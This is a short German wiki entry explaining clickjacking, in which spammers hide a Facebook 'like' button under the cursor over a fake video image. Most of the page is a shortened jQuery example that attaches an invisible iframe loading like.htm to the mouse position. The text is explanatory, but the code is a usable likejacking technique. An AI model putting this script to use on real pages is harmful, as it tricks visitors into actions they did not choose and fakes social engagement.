Clickjacking
Aus Wikizone
Clickjacking ist eine Technik, mit der vor allem Spammer versuchen dem User unbemerkt zu einem Klick auf einen kompromittierenden Link zu bewegen. Beliebt ist dies z.B. umd für Facebook gefällt mir Klicks zu bekommen.
Dazu benutzen die Spammer oft Videos (z.B. aus YouTube) die sie in Ihre Seite einbinden (bzw. einen Screenshot davon). Der Facebookbutton wird per Script an die Maus gehängt und unsichtbar gemacht. So klickt der Benutzer nicht nur aufs Video sondern auch auf den gefällt mir Button.
Beispiel (Script gekürzt dürfte mit jquery funktionieren):
<img src="video.jpg" alt="" style="width:1px;height:1px;" />
<img src="video_active.jpg" alt="" style="width:1px;height:1px;" />
<div id="walking_div"></div>
<script type="text/javascript" charset="utf-8">
$(document).ready(function() {
$('#walking_div').html('<iframe id="ifra" src="like.htm" scrolling="no" frameborder="0"></iframe>');
$('#player').mousemove(function(e) {
$('#walking_div').css('left', e.pageX-1+'px');
$('#walking_div').css('top', e.pageY-1+'px');
});
$('#player1').hover(function(){
$(this).css('background', 'url("video_active.jpg")');
$(this).css('cursor', 'pointer');
},function(){
$(this).css('background', 'url("video.jpg")');
$(this).css('cursor', 'auto');
});
$('button#showtrick').click(function() {
$('#walking_div').addClass('show');
$('div#fb_trick').show();
$(this).hide();
});
});
done = function() {
$('#walking_div').html("");
$('#player').css('display', 'none');
$('#realPlayer').css('display', 'block');
$('#walking_div').hide();
}
</script>
